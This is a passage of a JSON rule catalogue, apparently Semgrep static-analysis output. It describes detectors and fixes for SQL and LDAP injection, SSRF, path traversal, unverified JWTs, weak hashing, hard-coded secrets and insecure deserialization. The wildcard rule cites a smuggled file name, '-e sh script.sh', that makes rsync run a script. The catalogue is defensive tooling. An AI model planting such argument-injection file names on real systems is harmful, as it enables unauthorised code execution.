use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli)\n - [https://www.psycopg.org/docs/sql.html](https://www.psycopg.org/docs/sql.html)\n","text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","id":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","name":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"help":{"markdown":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected)\n - [https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)\n","text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","id":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","name":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","properties":{"precision":"very-high","tags":["CWE-155: Improper Neutralization of Wildcards or Matching Symbols","LOW CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.system-wildcard-detected.system-wildcard-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","id":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","name":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"help":{"markdown":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse)\n - [https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss](https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss)\n","text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse","id":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","name":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.request-data-fileresponse.request-data-fileresponse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"help":{"markdown":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4)\n - [https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms](https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","id":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","name":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","id":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","name":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","id":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","name":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"help":{"markdown":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n","text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","id":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","name":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet](https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","id":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","name":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint)\n - [https://docs.rs/reqwest/latest/reqwest/](https://docs.rs/reqwest/latest/reqwest/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint","id":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","name":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.ssrf.reqwest-taint.reqwest-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"help":{"markdown":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","id":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","name":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"help":{"markdown":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges)\n - [https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges","id":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","name":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.no-new-privileges.no-new-privileges"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","id":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","name":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","id":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","name":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"help":{"markdown":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources.\n\nReferences:\n - [Semgrep 